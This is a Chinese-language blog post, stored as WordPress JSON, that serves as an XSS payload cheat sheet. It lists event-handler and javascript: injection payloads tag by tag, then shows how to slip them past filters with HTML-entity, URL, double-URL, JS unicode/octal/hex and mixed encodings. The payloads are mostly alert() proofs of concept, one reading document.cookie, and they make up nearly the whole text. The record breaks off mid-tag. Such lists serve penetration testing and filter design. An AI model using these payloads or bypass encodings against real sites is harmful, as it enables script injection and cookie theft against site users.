{"id":605,"date":"2025-06-27T22:36:17","date_gmt":"2025-06-27T14:36:17","guid":{"rendered":"https:\/\/koishi.team\/?p=605"},"modified":"2025-07-02T20:49:49","modified_gmt":"2025-07-02T12:49:49","slug":"%e5%b8%b8%e7%94%a8xss","status":"publish","type":"post","link":"https:\/\/koishi.team\/index.php\/2025\/06\/27\/%e5%b8%b8%e7%94%a8xss\/","title":{"rendered":"\u5e38\u7528XSS"},"content":{"rendered":"\n<p class=\"wp-block-paragraph\" id=\"udf4c40e0\">XSS\u8de8\u7ad9<\/p>\n\n\n\n<h3 class=\"wp-block-heading\" id=\"q0drA\">0x01. &lt;a&gt; \u6807\u7b7e<\/h3>\n\n\n\n<pre id=\"KxoW4\" class=\"wp-block-code\"><code>&lt;a href=\"javascript:alert(1)\"&gt;test&lt;\/a&gt;\n&lt;a href=\"x\" onfocus=\"alert('xss');\" autofocus=\"\"&gt;xss&lt;\/a&gt;\n&lt;a href=\"x\" onclick=eval(\"alert('xss');\")&gt;xss&lt;\/a&gt;\n&lt;a href=\"x\" onmouseover=\"alert('xss');\"&gt;xss&lt;\/a&gt;\n&lt;a href=\"x\" onmouseout=\"alert('xss');\"&gt;xss&lt;\/a&gt;<\/code><\/pre>\n\n\n\n<h3 class=\"wp-block-heading\" id=\"EbGZW\">0x02. &lt;img&gt;\u6807\u7b7e<\/h3>\n\n\n\n<pre id=\"amZq0\" class=\"wp-block-code\"><code>&lt;img src=x onerror=\"alert(1)\">\n&lt;img src=x onerror=eval(\"alert(1)\")>\n&lt;img src=1 onmouseover=\"alert('xss');\">\n&lt;img src=1 onmouseout=\"alert('xss');\">\n&lt;img src=1 onclick=\"alert('xss');\"><\/code><\/pre>\n\n\n\n<h3 class=\"wp-block-heading\">0x03. &lt;iframe>\u6807\u7b7e<\/h3>\n\n\n\n<pre id=\"VaI9n\" class=\"wp-block-code\"><code>&lt;iframe src=\"javascript:alert(1)\"&gt;test&lt;\/iframe&gt;\n&lt;iframe onload=\"alert(document.cookie)\"&gt;&lt;\/iframe&gt;\n&lt;iframe onload=\"alert('xss');\"&gt;&lt;\/iframe&gt;\n&lt;iframe onload=\"base64,YWxlcnQoJ3hzcycpOw==\"&gt;&lt;\/iframe&gt;\n&lt;iframe onmouseover=\"alert('xss');\"&gt;&lt;\/iframe&gt;\n&lt;iframe src=\"data:text\/html;base64,PHNjcmlwdD5hbGVydCgneHNzJyk8L3NjcmlwdD4=\"&gt;<\/code><\/pre>\n\n\n\n<h3 class=\"wp-block-heading\" id=\"igVSC\">0x04. &lt;audio&gt; \u6807\u7b7e<\/h3>\n\n\n\n<pre id=\"CBVBV\" class=\"wp-block-code\"><code>&lt;audio src=1 onerror=alert(1)&gt;\n&lt;audio&gt;&lt;source src=\"x\" onerror=\"alert('xss');\"&gt;&lt;\/audio&gt;\n&lt;audio controls onfocus=eval(\"alert('xss');\") autofocus=\"\"&gt;&lt;\/audio&gt;\n&lt;audio controls onmouseover=\"alert('xss');\"&gt;&lt;source src=\"x\"&gt;&lt;\/audio&gt;<\/code><\/pre>\n\n\n\n<h3 class=\"wp-block-heading\" id=\"hwYR8\">0x05. &lt;video&gt;\u6807\u7b7e<\/h3>\n\n\n\n<pre id=\"OOy73\" class=\"wp-block-code\"><code>&lt;video src=x onerror=alert(1)&gt;\n&lt;video&gt;&lt;source onerror=\"alert('xss');\"&gt;&lt;\/video&gt;\n&lt;video controls onmouseover=\"alert('xss');\"&gt;&lt;\/video&gt;\n&lt;video controls onfocus=\"alert('xss');\" autofocus=\"\"&gt;&lt;\/video&gt;\n&lt;video controls onclick=\"alert('xss');\"&gt;&lt;\/video&gt;<\/code><\/pre>\n\n\n\n<h3 class=\"wp-block-heading\" id=\"Q9Riu\">0x06. &lt;svg&gt; \u6807\u7b7e<\/h3>\n\n\n\n<pre id=\"Hiadb\" class=\"wp-block-code\"><code>&lt;svg onload=javascript:alert(1)&gt;\n&lt;svg onload=\"alert('xss');\"&gt;&lt;\/svg&gt;<\/code><\/pre>\n\n\n\n<h3 class=\"wp-block-heading\" id=\"Xw18l\">0x07. &lt;button&gt; \u6807\u7b7e<\/h3>\n\n\n\n<pre id=\"usJpf\" class=\"wp-block-code\"><code>&lt;button onclick=alert(1)&gt;\n&lt;button onfocus=\"alert('xss');\" autofocus=\"\"&gt;xss&lt;\/button&gt;\n&lt;button onclick=\"alert('xss');\"&gt;xss&lt;\/button&gt;\n&lt;button onmouseover=\"alert('xss');\"&gt;xss&lt;\/button&gt;\n&lt;button onmouseout=\"alert('xss');\"&gt;xss&lt;\/button&gt;\n&lt;button onmouseup=\"alert('xss');\"&gt;xss&lt;\/button&gt;\n&lt;button onmousedown=\"alert('xss');\"&gt;&lt;\/button&gt;<\/code><\/pre>\n\n\n\n<h3 class=\"wp-block-heading\" id=\"kYuVR\">0x08. &lt;div&gt;\u6807\u7b7e<\/h3>\n\n\n\n<p class=\"wp-block-paragraph\" id=\"ub8478ffc\">\u8fd9\u4e2a\u9700\u8981\u501f\u52a9url\u7f16\u7801\u6765\u5b9e\u73b0\u7ed5\u8fc7<\/p>\n\n\n\n<pre id=\"SfZaO\" class=\"wp-block-code\"><code>\u539f\u4ee3\u7801\uff1a\n&lt;div onmouseover='alert(1)'&gt;DIV&lt;\/div&gt;\n\u7ecf\u8fc7url\u7f16\u7801\uff1a\n&lt;div onmouseover%3d'alert%26lpar%3b1%26rpar%3b'&gt;DIV&lt;%2fdiv&gt;<\/code><\/pre>\n\n\n\n<h3 class=\"wp-block-heading\" id=\"a7O5o\">0x09. &lt;object&gt;\u6807\u7b7e<\/h3>\n\n\n\n<p class=\"wp-block-paragraph\" id=\"uc7c3b975\">\u8fd9\u4e2a\u9700\u8981\u501f\u52a9 data \u4f2a\u534f\u8bae\u548c base64 \u7f16\u7801\u6765\u5b9e\u73b0\u7ed5\u8fc7<\/p>\n\n\n\n<p class=\"wp-block-paragraph\" id=\"u4bd53944\">&lt;object data=&#8221;data:text\/html;base64,PHNjcmlwdD5hbGVydCgveHNzLyk8L3NjcmlwdD4=&#8221;&gt;&lt;\/object&gt;<\/p>\n\n\n\n<h3 class=\"wp-block-heading\" id=\"Sw3yn\">0x10. &lt;script&gt; \u6807\u7b7e<\/h3>\n\n\n\n<pre id=\"T8Fl2\" class=\"wp-block-code\"><code>&lt;script&gt;alert('xss')&lt;\/script&gt;\n&lt;script&gt;alert(\/xss\/)&lt;\/script&gt;\n&lt;script&gt;alert(123)&lt;\/script&gt;<\/code><\/pre>\n\n\n\n<h3 class=\"wp-block-heading\" id=\"Y42FP\">0x11. &lt;p&gt; \u6807\u7b7e<\/h3>\n\n\n\n<pre id=\"WmbnI\" class=\"wp-block-code\"><code>&lt;p onclick=\"alert('xss');\"&gt;xss&lt;\/p&gt;\n&lt;p onmouseover=\"alert('xss');\"&gt;xss&lt;\/p&gt;\n&lt;p onmouseout=\"alert('xss');\"&gt;xss&lt;\/p&gt;\n&lt;p onmouseup=\"alert('xss');\"&gt;xss&lt;\/p&gt;<\/code><\/pre>\n\n\n\n<h3 class=\"wp-block-heading\" id=\"IAsDj\">0x12. &lt;input&gt; \u6807\u7b7e<\/h3>\n\n\n\n<pre id=\"Dh6Cd\" class=\"wp-block-code\"><code>&lt;input onclick=\"alert('xss');\"&gt;\n&lt;input onfocus=\"alert('xss');\"&gt;\n&lt;input onfocus=\"alert('xss');\" autofocus=\"\"&gt;\n&lt;input onmouseover=\"alert('xss');\"&gt;\n&lt;input type=\"text\" onkeydown=\"alert('xss');\"&gt;&lt;\/input&gt;\n&lt;input type=\"text\" onkeypress=\"alert('xss');\"&gt;&lt;\/input&gt;\n&lt;input type=\"text\" onkeydown=\"alert('xss');\"&gt;&lt;\/input&gt;<\/code><\/pre>\n\n\n\n<h3 class=\"wp-block-heading\" id=\"EOTFj\">0x13. &lt;details&gt;\u6807\u7b7e<\/h3>\n\n\n\n<pre id=\"M5vJg\" class=\"wp-block-code\"><code>&lt;details ontoggle=\"alert('xss');\"&gt;&lt;\/details&gt;\n&lt;details ontoggle=\"alert('xss');\" open=\"\"&gt;&lt;\/details&gt;<\/code><\/pre>\n\n\n\n<h3 class=\"wp-block-heading\" id=\"ZTUEX\">0x14. &lt;select&gt; \u6807\u7b7e<\/h3>\n\n\n\n<pre id=\"kviwG\" class=\"wp-block-code\"><code>&lt;select onfocus=\"alert('xss');\" autofocus&gt;&lt;\/select&gt;\n&lt;select onmouseover=\"alert('xss');\"&gt;&lt;\/select&gt;\n&lt;select onclick=eval(\"alert('xss');\")&gt;&lt;\/select&gt;<\/code><\/pre>\n\n\n\n<h3 class=\"wp-block-heading\" id=\"zlgRy\">0x15. &lt;form&gt; \u6807\u7b7e<\/h3>\n\n\n\n<pre class=\"wp-block-code\"><code>&lt;form method=\"x\" action=\"x\" onmouseover=\"alert('xss');\"&gt;&lt;input type=submit&gt;&lt;\/form&gt;<br>&lt;form method=\"x\" action=\"x\" onmouseout=\"alert('xss');\"&gt;&lt;input type=submit&gt;&lt;\/form&gt;<br>&lt;form method=\"x\" action=\"x\" onmouseup=\"alert('xss');\"&gt;&lt;input type=submit&gt;&lt;\/form&gt;<\/code><\/pre>\n\n\n\n<h3 class=\"wp-block-heading\" id=\"WXMVc\">0x16. &lt;body&gt; \u6807\u7b7e<\/h3>\n\n\n\n<p class=\"wp-block-paragraph\" id=\"ua5589b2c\">&lt;body onload=&#8221;alert(&#8216;xss&#8217;);&#8221;&gt;&lt;\/body&gt;<\/p>\n\n\n\n<p class=\"wp-block-paragraph\" id=\"u8ec6983b\"><br><\/p>\n\n\n\n<h2 class=\"wp-block-heading\" id=\"lZe5M\">\u4e8c\u3001xss \u5e38\u89c1\u7ed5\u8fc7<\/h2>\n\n\n\n<h2 class=\"wp-block-heading\" id=\"NG8fZ\">\u7f16\u7801\u7ed5\u8fc7<\/h2>\n\n\n\n<p class=\"wp-block-paragraph\" id=\"u5cef0898\">\u6d4f\u89c8\u5668\u5bf9 XSS \u4ee3\u7801\u7684\u89e3\u6790\u987a\u5e8f\u4e3a\uff1a<strong>HTML\u89e3\u7801 \u2014\u2014 URL\u89e3\u7801 \u2014\u2014 JS\u89e3\u7801(\u53ea\u652f\u6301UNICODE)<\/strong>\u3002<\/p>\n\n\n\n<h3 class=\"wp-block-heading\" id=\"yDd8y\">0x01. html \u5b9e\u4f53\u7f16\u7801<\/h3>\n\n\n\n<p class=\"wp-block-paragraph\" id=\"u20cbd4d8\"><strong>\u5f53\u53ef\u63a7\u70b9\u4e3a\u5355\u4e2a\u6807\u7b7e\u5c5e\u6027\u65f6\uff0c\u53ef\u4ee5\u4f7f\u7528 html \u5b9e\u4f53\u7f16\u7801\u3002<\/strong><\/p>\n\n\n\n<pre id=\"uiIdy\" class=\"wp-block-code\"><code>&lt;a href=\"\u53ef\u63a7\u70b9\"&gt;test&lt;\/a&gt;\n\n&lt;iframe src=\"\u53ef\u63a7\u70b9\"&gt;test&lt;iframe&gt;\n&lt;img src=x onerror=\"\u53ef\u63a7\u70b9\"&gt;<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\" id=\"u384702cc\"><strong>Payload<\/strong><\/p>\n\n\n\n<p class=\"wp-block-paragraph\" id=\"u40dd479e\">&lt;a href=&#8221;javascript:alert(1)&#8221;&gt;test&lt;\/a&gt;<\/p>\n\n\n\n<p class=\"wp-block-paragraph\" id=\"u985d0678\"><strong>\u5341\u8fdb\u5236<\/strong><\/p>\n\n\n\n<p class=\"wp-block-paragraph\" id=\"ua6f3699a\">&lt;a href=&#8221;&amp;#106;&amp;#97;&amp;#118;&amp;#97;&amp;#115;&amp;#99;&amp;#114;&amp;#105;&amp;#112;&amp;#116;&amp;#58;&amp;#97;&amp;#108;&amp;#101;&amp;#114;&amp;#116;&amp;#40;&amp;#49;&amp;#41;&#8221;&gt;test&lt;\/a&gt;<\/p>\n\n\n\n<p class=\"wp-block-paragraph\" id=\"u8a125c02\"><strong>\u5341\u516d\u8fdb\u5236<\/strong><\/p>\n\n\n\n<p class=\"wp-block-paragraph\" id=\"u87947c6e\">&lt;a href=&#8221;&amp;#x6a;&amp;#x61;&amp;#x76;&amp;#x61;&amp;#x73;&amp;#x63;&amp;#x72;&amp;#x69;&amp;#x70;&amp;#x74;&amp;#x3a;&amp;#x61;&amp;#x6c;&amp;#x65;&amp;#x72;&amp;#x74;&amp;#x28;&amp;#x31;&amp;#x29;&#8221;&gt;test&lt;\/a&gt;<\/p>\n\n\n\n<p class=\"wp-block-paragraph\" id=\"uc546f458\"><strong>\u53ef\u4ee5\u4e0d\u5e26\u5206\u53f7<\/strong><\/p>\n\n\n\n<p class=\"wp-block-paragraph\" id=\"u0fa0d036\">&lt;a href=&#8221;&amp;#x6a&amp;#x61&amp;#x76&amp;#x61&amp;#x73&amp;#x63&amp;#x72&amp;#x69&amp;#x70&amp;#x74&amp;#x3a&amp;#x61&amp;#x6c&amp;#x65&amp;#x72&amp;#x74&amp;#x28&amp;#x31&amp;#x29&#8243;&gt;test&lt;\/a&gt;<\/p>\n\n\n\n<p class=\"wp-block-paragraph\" id=\"uedfa5100\"><strong>\u53ef\u4ee5\u586b\u51450<\/strong><\/p>\n\n\n\n<p class=\"wp-block-paragraph\" id=\"u3d11972c\">&lt;a href=&#8221;&amp;#x006a&amp;#x0061&amp;#x0076&amp;#x0061&amp;#x0073&amp;#x0063&amp;#x0072&amp;#x0069&amp;#x0070&amp;#x0074&amp;#x003a&amp;#x0061&amp;#x006c&amp;#x0065&amp;#x0072&amp;#x0074&amp;#x0028&amp;#x0031&amp;#x0029&#8243;&gt;test&lt;\/a&gt;<\/p>\n\n\n\n<h3 class=\"wp-block-heading\" id=\"X8pSr\">0x02. url \u7f16\u7801<\/h3>\n\n\n\n<p class=\"wp-block-paragraph\" id=\"u6d8dad77\"><strong>\u5f53\u6ce8\u5165\u70b9\u5b58\u5728 href \u6216\u8005 src \u5c5e\u6027\u65f6\uff0c\u53ef\u4ee5\u4f7f\u7528 url \u7f16\u7801\u3002<\/strong><\/p>\n\n\n\n<pre id=\"EzmZf\" class=\"wp-block-code\"><code>&lt;a href=\"\u53ef\u63a7\u70b9\"&gt;test&lt;\/a&gt;\n\n&lt;iframe src=\"\u53ef\u63a7\u70b9\"&gt;test&lt;\/iframe&gt;<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\" id=\"u7979f52e\"><strong>Payload<\/strong><\/p>\n\n\n\n<pre id=\"m7VcZ\" class=\"wp-block-code\"><code>&lt;a href=\"javascript:alert(1)\"&gt;test&lt;\/a&gt;\n\n&lt;iframe src=\"javascript:alert(1)\"&gt;test&lt;\/iframe&gt;<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\" id=\"u3e0771b9\"><strong>\u6ce8\uff1aurl \u89e3\u6790\u8fc7\u7a0b\u4e2d\uff0c\u4e0d\u80fd\u5bf9\u534f\u8bae\u7c7b\u578b\u8fdb\u884c\u4efb\u4f55\u7684\u7f16\u7801\u64cd\u4f5c\uff0c\u6240\u4ee5 javascript: \u534f\u8bae\u5934\u9700\u8981\u4fdd\u7559\u3002<\/strong><\/p>\n\n\n\n<pre id=\"zZPB9\" class=\"wp-block-code\"><code>&lt;a href=\"javascript:%61%6c%65%72%74%28%31%29\"&gt;test&lt;\/a&gt;\n\n&lt;iframe src=\"javascript:%61%6c%65%72%74%28%31%29\"&gt;test&lt;\/iframe&gt;<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\" id=\"u6755e34d\"><strong>\u53ef\u4ee5\u4e8c\u6b21\u7f16\u7801<\/strong><\/p>\n\n\n\n<pre id=\"Rvc2W\" class=\"wp-block-code\"><code>&lt;a href=\"javascript:%2561%256c%2565%2572%2574%2528%2531%2529\"&gt;test&lt;\/a&gt;\n\n&lt;iframe src=\"javascript:%2561%256c%2565%2572%2574%2528%2531%2529\"&gt;test&lt;\/iframe&gt;<\/code><\/pre>\n\n\n\n<h3 class=\"wp-block-heading\" id=\"ossLP\">0x03. js \u7f16\u7801<\/h3>\n\n\n\n<p class=\"wp-block-paragraph\" id=\"u7e256422\"><strong>\u89e3\u6790\u7684\u65f6\u5019\u5b57\u7b26\u6216\u8005\u5b57\u7b26\u4e32\u4ec5\u4f1a\u88ab\u89e3\u7801\u4e3a\u5b57\u7b26\u4e32\u6587\u672c\u6216\u8005\u6807\u8bc6\u7b26\u540d\u79f0\uff0c\u4f8b\u5982 js \u89e3\u6790\u5668\u5de5\u4f5c\u7684\u65f6\u5019\u5c06<\/strong><code><strong>\\u0061\\u006c\\u0065\\u0072\\u0074<\/strong><\/code><strong>\u8fdb\u884c\u89e3\u7801\u540e\u4e3a<\/strong><code><strong>alert<\/strong><\/code><strong>\uff0c\u800c<\/strong><code><strong>alert<\/strong><\/code><strong>\u662f\u4e00\u4e2a\u6709\u6548\u7684\u6807\u8bc6\u7b26\u540d\u79f0\uff0c\u5b83\u662f\u80fd\u88ab\u6b63\u5e38\u89e3\u6790\u7684\u3002\u4f46\u662f\u50cf\u5706\u62ec\u53f7\u3001\u53cc\u5f15\u53f7\u3001\u5355\u5f15\u53f7\u7b49\u7b49\u8fd9\u4e9b\u5b57\u7b26\u5c31\u53ea\u80fd\u88ab\u5f53\u4f5c\u666e\u901a\u7684\u6587\u672c\uff0c\u4ece\u800c\u5bfc\u81f4\u65e0\u6cd5\u6267\u884c\u3002<\/strong><\/p>\n\n\n\n<p class=\"wp-block-paragraph\" id=\"uc97453c0\"><strong>\u7531\u4e8e js \u662f\u6700\u540e\u8fdb\u884c\u89e3\u6790\u7684\uff0c\u6240\u4ee5\u5982\u679c\u6df7\u5408\u7f16\u7801\uff0c\u9700\u8981\u5148\u4f7f\u7528 js \u7f16\u7801\u518d\u8fdb\u884c url \u7f16\u7801\u6216\u8005 html \u5b9e\u4f53\u7f16\u7801\u3002<\/strong><\/p>\n\n\n\n<p class=\"wp-block-paragraph\" id=\"ue8cec0ff\"><strong>js \u7f16\u7801\u7b56\u7565\uff1a<\/strong><\/p>\n\n\n\n<ol class=\"wp-block-list\">\n<li>&#8220;\\&#8221; \u52a0\u4e0a\u4e09\u4e2a\u516b\u8fdb\u5236\u6570\u5b57\uff0c\u5982\u679c\u4e2a\u6570\u4e0d\u591f\uff0c\u524d\u9762\u88650\uff0c\u4f8b\u5982 &#8220;&lt;&#8221; \u7f16\u7801\u4e3a &#8220;\\074&#8221;<\/li>\n\n\n\n<li>&#8220;\\x&#8221; \u52a0\u4e0a\u4e24\u4e2a\u5341\u516d\u8fdb\u5236\u6570\u5b57\uff0c\u5982\u679c\u4e2a\u6570\u4e0d\u591f\uff0c\u524d\u9762\u88650\uff0c\u4f8b\u5982 &#8220;&lt;&#8221; \u7f16\u7801\u4e3a &#8220;\\x3c&#8221;<\/li>\n\n\n\n<li>&#8220;\\u&#8221; \u52a0\u4e0a\u56db\u4e2a\u5341\u516d\u8fdb\u5236\u6570\u5b57\uff0c\u5982\u679c\u4e2a\u6570\u4e0d\u591f\uff0c\u524d\u9762\u88650\uff0c\u4f8b\u5982 &#8220;&lt;&#8221; \u7f16\u7801\u4e3a &#8220;\\u003c&#8221;<\/li>\n\n\n\n<li>\u5bf9\u4e8e\u4e00\u4e9b\u63a7\u5236\u5b57\u7b26\uff0c\u4f7f\u7528\u7279\u6b8a\u7684 C \u7c7b\u578b\u7684\u8f6c\u4e49\u98ce\u683c\uff08\u4f8b\u5982 \\n \u548c \\r\uff09<\/li>\n<\/ol>\n\n\n\n<pre id=\"PWdsT\" class=\"wp-block-code\"><code>&lt;img src=x onerror=\"\u53ef\u63a7\u70b9\"&gt;\n\n&lt;input onfocus=location=\"\u53ef\u63a7\u70b9\" autofocus&gt;<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\" id=\"u96239e0b\"><strong>Payload<\/strong><\/p>\n\n\n\n<pre id=\"S0qes\" class=\"wp-block-code\"><code>&lt;img src=x onerror=\"alert(1)\"&gt;\n\n&lt;input onfocus=location=\"alert(1)\" autofocus&gt;<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\" id=\"u354e1792\"><strong>Unicode \u7f16\u7801<\/strong><\/p>\n\n\n\n<pre id=\"jpoTA\" class=\"wp-block-code\"><code>&lt;img src=x onerror=\"\\u0061\\u006c\\u0065\\u0072\\u0074(1)\"&gt;\n\n&lt;input onfocus=location=\"javascript:\\u0061\\u006C\\u0065\\u0072\\u0074\\u0028\\u0031\\u0029\" autofocus&gt;<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\" id=\"u6d87033b\"><strong>\u6ce8\uff1a<\/strong><\/p>\n\n\n\n<p class=\"wp-block-paragraph\" id=\"u3c32c258\"><strong>Unicode \u7f16\u7801\u65f6\uff0c\u53ea\u80fd\u5bf9\u6709\u6548\u7684\u6807\u8bc6\u7b26\u8fdb\u884c\u7f16\u7801\uff0c\u5426\u5219\u975e\u6807\u8bc6\u7b26\u89e3\u7801\u540e\u4e0d\u80fd\u89e3\u6790\u6267\u884c\u3002\u4f8b\u5982 javascript:alert(1) \uff0c\u8fdb\u884c Unicode \u7f16\u7801\u65f6\uff0c\u53ea\u80fd\u5bf9 alert \u548c &#8220;1&#8221; \u8fdb\u884c\u7f16\u7801\uff0c\u6846\u53f7\u7f16\u7801\u540e\u4f1a\u88ab\u5f53\u6210\u6587\u672c\u5b57\u7b26\uff0c\u4e0d\u80fd\u6267\u884c\u3002<\/strong><strong>ascii \u516b\u8fdb\u5236\u548c\u5341\u516d\u8fdb\u5236\u7f16\u7801\u4f7f\u7528\u65f6\u9700\u8981 eval\u3001setTimeout\u7b49\u51fd\u6570\u4f20\u9012\u53d8\u91cf\uff0c\u5e76\u4e14\u53ef\u4ee5\u5bf9\u6574\u4e2a\u4f20\u9012\u53c2\u6570\u8fdb\u884c\u7f16\u7801\u3002\u4f8b\u5982 eval(&#8220;alert(1)&#8221;)\uff0c\u53ef\u4ee5\u5bf9 &#8220;alert(1)&#8221; \u6574\u4e2a\u8fdb\u884c\u516b\u8fdb\u5236\u3001\u5341\u516d\u8fdb\u5236\u6216\u8005 Unicode \u7f16\u7801(\u53cc\u5f15\u53f7\u4e0d\u53c2\u4e0e)\u3002<\/strong><\/p>\n\n\n\n<p class=\"wp-block-paragraph\" id=\"uc98285d3\"><strong>\u516b\u8fdb\u5236\u548c\u5341\u516d\u8fdb\u5236<\/strong><\/p>\n\n\n\n<p class=\"wp-block-paragraph\" id=\"u75d6786c\">setTimeout() \u662f\u5c5e\u4e8e window \u7684\u65b9\u6cd5\uff0c\u8be5\u65b9\u6cd5\u7528\u4e8e\u5728\u6307\u5b9a\u7684\u6beb\u79d2\u6570\u540e\u8c03\u7528\u51fd\u6570\u6216\u8ba1\u7b97\u8868\u8fbe\u5f0f\u3002<\/p>\n\n\n\n<p class=\"wp-block-paragraph\" id=\"u04abab74\">\u8bed\u6cd5\uff1a<code>setTimeout(\u8981\u6267\u884c\u7684\u4ee3\u7801, \u7b49\u5f85\u7684\u6beb\u79d2\u6570)<\/code><\/p>\n\n\n\n<p class=\"wp-block-paragraph\" id=\"u48541fb2\"><code>setTimeout(JavaScript \u51fd\u6570, \u7b49\u5f85\u7684\u6beb\u79d2\u6570)<\/code><\/p>\n\n\n\n<pre id=\"YqQZh\" class=\"wp-block-code\"><code>1.&lt;svg\/onload=setTimeout('\\x61\\x6C\\x65\\x72\\x74\\x28\\x31\\x29')&gt;\n2.&lt;svg\/onload=setTimeout('\\141\\154\\145\\162\\164\\050\\061\\051')&gt;\n3.&lt;svg\/onload=setTimeout('\\u0061\\u006C\\u0065\\u0072\\u0074\\u0028\\u0031\\u0029')&gt;\n4.&lt;script&gt;eval(\"\\x61\\x6C\\x65\\x72\\x74\\x28\\x31\\x29\")&lt;\/script&gt;\n5.&lt;script&gt;eval(\"\\141\\154\\145\\162\\164\\050\\061\\051\")&lt;\/script&gt;\n6.&lt;script&gt;eval(\"\\u0061\\u006C\\u0065\\u0072\\u0074\\u0028\\u0031\\u0029\")&lt;\/script&gt;<\/code><\/pre>\n\n\n\n<h3 class=\"wp-block-heading\" id=\"ERDHg\">0x04. \u6df7\u5408\u7f16\u7801<\/h3>\n\n\n\n<p class=\"wp-block-paragraph\" id=\"ud62a0377\">&lt;a href=&#8221;\u53ef\u63a7\u70b9&#8221;&gt;test&lt;\/a&gt;<\/p>\n\n\n\n<p class=\"wp-block-paragraph\" id=\"u7ecf3bc7\"><strong>Payload<\/strong><\/p>\n\n\n\n<p class=\"wp-block-paragraph\" id=\"ud715fdd2\">&lt;a href=&#8221;javascript:alert(1)&#8221;&gt;test&lt;\/a&gt;<\/p>\n\n\n\n<p class=\"wp-block-paragraph\" id=\"u02eae326\"><strong>html \u7f16\u7801<\/strong><\/p>\n\n\n\n<p class=\"wp-block-paragraph\" id=\"ubd695481\">&lt;a href=&#8221;&amp;#x6a;&amp;#x61;&amp;#x76;&amp;#x61;&amp;#x73;&amp;#x63;&amp;#x72;&amp;#x69;&amp;#x70;&amp;#x74;&amp;#x3a;&amp;#x61;&amp;#x6c;&amp;#x65;&amp;#x72;&amp;#x74;&amp;#x28;&amp;#x31;&amp;#x29;&#8221;&gt;test&lt;\/a&gt;<\/p>\n\n\n\n<p class=\"wp-block-paragraph\" id=\"u1793021d\"><strong>Unicode \u7f16\u7801<\/strong><\/p>\n\n\n\n<p class=\"wp-block-paragraph\" id=\"uebde0e48\">&lt;a href=&#8221;javascript:\\u0061\\u006c\\u0065\\u0072\\u0074(1)&#8221;&gt;test&lt;\/a&gt;<\/p>\n\n\n\n<p class=\"wp-block-paragraph\" id=\"u18ad36bc\"><strong>\u6ce8\uff1aUnicode \u7f16\u7801\u4e0d\u80fd\u5bf9\u62ec\u53f7\u4f7f\u7528<\/strong><\/p>\n\n\n\n<p class=\"wp-block-paragraph\" id=\"u17b1c422\"><strong>url \u7f16\u7801<\/strong><\/p>\n\n\n\n<p class=\"wp-block-paragraph\" id=\"u92261343\">&lt;a href=&#8221;javascript:%61%6c%65%72%74%28%31%29&#8243;&gt;test&lt;\/a&gt;<\/p>\n\n\n\n<p class=\"wp-block-paragraph\" id=\"u46b805a3\"><strong>\u7531\u4e8e\u6d4f\u89c8\u5668\u5bf9 xss \u4ee3\u7801\u7684\u89e3\u6790\u8fc7\u7a0b\u662f\uff1ahtml\u89e3\u6790 \u2014\u2014 url\u89e3\u6790 \u2014\u2014 js\u89e3\u6790\uff0c\u6240\u4ee5\u53ef\u4ee5\u7f16\u7801\u65b9\u5f0f\u8fdb\u884c\u7ec4\u5408\u7ed5\u8fc7\u3002<\/strong><\/p>\n\n\n\n<pre id=\"b0K6d\" class=\"wp-block-code\"><code>1. \u539f\u4ee3\u7801\n&lt;a href=\"javascript:alert(1)\"&gt;test&lt;\/a&gt;\n2. \u5bf9alert\u8fdb\u884cJS\u7f16\u7801\uff08unicode\u7f16\u7801\uff09\n&lt;a href=\"javascript:\\u0061\\u006c\\u0065\\u0072\\u0074(1)\"&gt;test&lt;\/a&gt;\n3. \u5bf9href\u6807\u7b7e\u4e2d\u7684\\u0061\\u006c\\u0065\\u0072\\u0074\u8fdb\u884cURL\u7f16\u7801\n&lt;a href=\"javascript:%5c%75%30%30%36%31%5c%75%30%30%36%63%5c%75%30%30%36%35%5c%75%30%30%37%32%5c%75%30%30%37%34(1)\"&gt;test&lt;\/a&gt;\n4. \u5bf9href\u6807\u7b7e\u4e2d\u7684javascript:%5c%75%30%30%36%31%5c%75%30%30%36%63%5c%75%30%30%36%35%5c%75%30%30%37%32%5c%75%30%30%37%34(1)\u8fdb\u884cHTML\u7f16\u7801\uff1a\n&lt;a href=\"&amp;#x6a;&amp;#x61;&amp;#x76;&amp;#x61;&amp;#x73;&amp;#x63;&amp;#x72;&amp;#x69;&amp;#x70;&amp;#x74;&amp;#x3a;&amp;#x25;&amp;#x35;&amp;#x63;&amp;#x25;&amp;#x37;&amp;#x35;&amp;#x25;&amp;#x33;&amp;#x30;&amp;#x25;&amp;#x33;&amp;#x30;&amp;#x25;&amp;#x33;&amp;#x36;&amp;#x25;&amp;#x33;&amp;#x31;&amp;#x25;&amp;#x35;&amp;#x63;&amp;#x25;&amp;#x37;&amp;#x35;&amp;#x25;&amp;#x33;&amp;#x30;&amp;#x25;&amp;#x33;&amp;#x30;&amp;#x25;&amp;#x33;&amp;#x36;&amp;#x25;&amp;#x36;&amp;#x33;&amp;#x25;&amp;#x35;&amp;#x63;&amp;#x25;&amp;#x37;&amp;#x35;&amp;#x25;&amp;#x33;&amp;#x30;&amp;#x25;&amp;#x33;&amp;#x30;&amp;#x25;&amp;#x33;&amp;#x36;&amp;#x25;&amp;#x33;&amp;#x35;&amp;#x25;&amp;#x35;&amp;#x63;&amp;#x25;&amp;#x37;&amp;#x35;&amp;#x25;&amp;#x33;&amp;#x30;&amp;#x25;&amp;#x33;&amp;#x30;&amp;#x25;&amp;#x33;&amp;#x37;&amp;#x25;&amp;#x33;&amp;#x32;&amp;#x25;&amp;#x35;&amp;#x63;&amp;#x25;&amp;#x37;&amp;#x35;&amp;#x25;&amp;#x33;&amp;#x30;&amp;#x25;&amp;#x33;&amp;#x30;&amp;#x25;&amp;#x33;&amp;#x37;&amp;#x25;&amp;#x33;&amp;#x34;&amp;#x28;&amp;#x31;&amp;#x29;\"&gt;test&lt;\/a&gt;<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\" 